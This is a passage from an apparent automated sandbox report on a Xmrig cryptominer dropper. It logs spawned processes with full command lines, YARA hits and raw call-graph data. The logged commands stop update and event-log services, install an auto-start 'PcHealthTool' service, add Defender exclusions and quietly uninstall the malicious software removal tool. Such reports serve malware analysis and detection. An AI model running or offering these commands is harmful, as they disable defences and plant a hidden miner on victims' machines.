                                            Target ID:17
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:18
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop bits
                                            Imagebase:0x7ff7c59c0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:19
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:20
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop dosvc
                                            Imagebase:0x7ff7c59c0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:21
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:22
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                            Imagebase:0x7ff6ed240000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:23
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                            Imagebase:0x7ff6ed240000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:24
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:25
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                            Imagebase:0x7ff6ed240000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:26
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:27
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                            Imagebase:0x7ff6ed240000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:28
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:29
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:30
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe delete "PcHealthTool"
                                            Imagebase:0x7ff7c59c0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:31
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:32
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto"
                                            Imagebase:0x7ff7c59c0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:33
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:35
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop eventlog
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:36
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe start "PcHealthTool"
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:37
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:38
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"
                                            Imagebase:0x7ff790150000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:39
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:40
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:41
                                            Start time:09:44:53
                                            Start date:25/08/2024
                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe"
                                            Imagebase:0x140000000
                                            File size:827'374'560 bytes
                                            MD5 hash:286405D179DCBBC1ACB0B5957B45CDF7
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Target ID:42
                                            Start time:09:44:50
                                            Start date:25/08/2024
                                            Path:C:\ProgramData\PcHealthTool\HealthTool.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\ProgramData\PcHealthTool\HealthTool.exe
                                            Imagebase:0x140000000
                                            File size:831'071'200 bytes
                                            MD5 hash:FCE277E4928FDE19CD8BAD5CE1997792
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                            • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                            • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                            Has exited:true

                                            Target ID:43
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\choice.exe
                                            Wow64 process (32bit):false
                                            Commandline:choice /C Y /N /D Y /T 3
                                            Imagebase:0x7ff7aa6b0000
                                            File size:35'840 bytes
                                            MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:44
                                            Start time:09:44:51
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                            Imagebase:0x7ff73c1e0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:45
                                            Start time:09:44:51
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:46
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                            Imagebase:0x7ff790150000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:47
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:48
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:49
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:50
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\wusa.exe
                                            Wow64 process (32bit):false
                                            Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                            Imagebase:0x7ff743070000
                                            File size:345'088 bytes
                                            MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:51
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:52
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:53
                                            Start time:09:44:57
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:54
                                            Start time:09:44:57
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:55
                                            Start time:09:44:57
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop bits
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:56
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:57
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop dosvc
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:58
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:59
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                            Imagebase:0x7ff72d760000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:60
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                            Imagebase:0x7ff72d760000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:61
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:62
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                            Imagebase:0x7ff71e800000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:63
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:64
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                            Imagebase:0x7ff72d760000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:65
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:66
                                            Start time:09:44:59
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:67
                                            Start time:09:44:59
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Target ID:68
                                            Start time:09:44:59
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\dwm.exe
                                            Wow64 process (32bit):false
                                            Commandline:dwm.exe
                                            Imagebase:0x7ff74e710000
                                            File size:94'720 bytes
                                            MD5 hash:5C27608411832C5B39BA04E33D53536C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000044.00000002.2958991562.000001F3D6BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000044.00000003.2855013595.000001F3D6BDF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000044.00000002.2958991562.000001F3D6BDF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000044.00000002.2958991562.000001F3D6B89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000044.00000002.2958991562.000001F3D6C5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Has exited:false

                                              Execution Graph

                                              Execution Coverage:9.2%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:22.3%
                                              Total number of Nodes:1656
                                              Total number of Limit Nodes:44
25077->25076 25088 631590 25078->25088 25081 61bd07 25090 61da1e 25081->25090 25082 61bd2c 25084 6310f9 CatchGuardHandler 5 API calls 25082->25084 25086 61bcd4 25084->25086 25086->24780 25086->24916 25087 61bd1d GetFileAttributesW 25087->25082 25089 61bcea GetFileAttributesW 25088->25089 25089->25081 25089->25082 25093 61da28 _wcslen 25090->25093 25091 6310f9 CatchGuardHandler 5 API calls 25092 61bd19 25091->25092 25092->25082 25092->25087 25094 61daf7 GetCurrentDirectoryW 25093->25094 25095 61da6f _wcslen 25093->25095 25094->25095 25095->25091 25097 62d3b2 GetTokenInformation 25096->25097 25102 62d409 25096->25102 25098 62d3d7 ___std_exception_copy 25097->25098 25099 62d3cc GetLastError 25097->25099 25100 62d3e0 GetTokenInformation 25098->25100 25099->25098 25099->25102 25101 62d3fa CopySid 25100->25101 25100->25102 25101->25102 25102->24918 25104 61beee 25103->25104 25105 61bf1c 25104->25105 25106 61bf0f CreateDirectoryW 25104->25106 25107 61bccb 8 API calls 25105->25107 25106->25105 25108 61bf4f 25106->25108 25109 61bf22 25107->25109 25111 61bf5e 25108->25111 25119 61c2e5 25108->25119 25110 61bf62 GetLastError 25109->25110 25112 61da1e 6 API calls 25109->25112 25110->25111 25114 6310f9 CatchGuardHandler 5 API calls 25111->25114 25115 61bf38 25112->25115 25116 61bf85 25114->25116 25115->25110 25117 61bf3c CreateDirectoryW 25115->25117 25116->24933 25117->25108 25117->25110 25118->24938 25120 631590 25119->25120 25121 61c2f2 SetFileAttributesW 25120->25121 25122 61c314 25121->25122 25123 61c33f 25121->25123 25125 61da1e 6 API calls 25122->25125 25124 6310f9 CatchGuardHandler 5 API calls 25123->25124 25126 61c34d 25124->25126 25127 61c326 25125->25127 25126->25111 25127->25123 25128 61c32a SetFileAttributesW 25127->25128 25128->25123 25130 614bea __vswprintf_c_l 25129->25130 25133 638772 25130->25133 25136 636835 25133->25136 25137 636875 25136->25137 25138 63685d 25136->25138 25137->25138 25140 63687d 25137->25140 25153 63bc7b 20 API calls _abort 25138->25153 
